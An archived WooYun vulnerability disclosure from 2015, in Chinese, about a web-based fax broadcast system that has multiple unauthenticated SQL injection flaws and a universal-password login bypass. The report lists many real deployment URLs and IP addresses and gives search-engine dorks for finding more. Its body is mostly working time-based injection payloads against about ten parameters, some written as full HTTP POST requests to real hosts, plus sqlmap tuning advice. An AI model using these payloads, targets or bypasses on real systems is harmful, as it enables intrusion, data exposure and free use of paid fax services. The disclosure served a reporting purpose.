乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-24: 细节已通知厂商并且等待厂商处理中 2015-04-28: 厂商已经确认,细节仅向厂商公开 2015-05-01: 细节向第三方安全合作伙伴开放 2015-06-22: 细节向核心白帽子及相关领域专家公开 2015-07-02: 细节向普通白帽子公开 2015-07-12: 细节向实习白帽子公开 2015-07-27: 细节向公众公开
发传真就像打电话一样,要计费的。我的妈啊。。这样系统你还敢用吗?
案例:
http://www.5fax.net/http://119.145.255.46:8888/http://202.104.186.93/http://113.105.225.250:8888/http://211.154.136.8:8080/http://113.105.225.250/http://124.232.137.215/http://202.105.179.216:8888/http://202.105.179.171:8888/http://202.104.186.94:8888/http://www.fax400800.net/http://www.51fax.com/http://www.ltfax.net:8080/http://www.baoyuefax.com/http://fax998.cn/http://www.02309.com/http://www.hdf518.net/http://www.258fax.com/http://sz.mmfax.com/http://www.518fax.cn/http://www.168talk.net/http://hi.fax10000.net/http://258fax.com:8888/
百度:intitle:"传真群发系统"佛法:title="传真系统"会找到更多案例。万能密码可登录,当时登录后就惊呆了,可免费发传真,查询以往传真记录。。10处注入都是无需登录的。
http://地址/user/action/fax_stat.php?current_page=1&findenddate=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&findstartdate=2015-04-19参数findenddatehttp://地址/user/action/fax_stat.php?current_page=1&findenddate=2015-04-23&findstartdate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/参数findstartdatehttp://地址/user/bankpay/bankpay_check_account.php?account=-1'%20OR%203*2*1%3d6%20AND%20000355%3d000355%20--%20&action=check参数accounthttp://地址/user/http/httpnews.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&type=htmlhttp://地址/user/http/httprequest.php?area_code=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&groupid=1&requestcontent=number_section参数area_codehttp://地址/user/http/httprequest.php?province_code=hebei'%20AND%203*2*1%3d6%20AND%20'000zzp0'%3d'000zzp0&requestcontent=area参数province_codePOST /user/action/forgetpwd_action.php HTTP/1.1Content-Length: 198Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://113.105.225.250:8888/Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0Host: 113.105.225.250:8888Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*button=%e6%8f%90%e4%ba%a4&action=getpwd&email=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&username=igwyhlgw参数emailPOST /user/action/forgetpwd_action.php HTTP/1.1Content-Length: 208Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://113.105.225.250:8888/Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0Host: 113.105.225.250:8888Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*button=%e6%8f%90%e4%ba%a4&action=getpwd&email=sample%40email.tst&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/参数usernamePOST /user/bankpay/chargeportal_action.php HTTP/1.1Content-Length: 195Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://113.105.225.250:8888/Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0Host: 113.105.225.250:8888Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*account=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&action=charge&channel=bank_ICBC&money=&orderAmount=1参数accountPOST /user/action/login_action.php HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://119.145.255.46:8888/index.htmlAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: 119.145.255.46:8888Content-Length: 80Proxy-Connection: Keep-AlivePragma: no-cacheCookie: PHPSESSID=cuiafoms2arf10c124vgfg6nr2action=login&logintype=username&account=asdasd&password=asdasd&userauthcode=muoi参数account 使用sqlmap的时候必须加time-sec才能注入。
可使用万能密码登录系统。
过滤
危害等级:高
漏洞Rank:14
确认时间:2015-04-28 09:48
CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。
暂无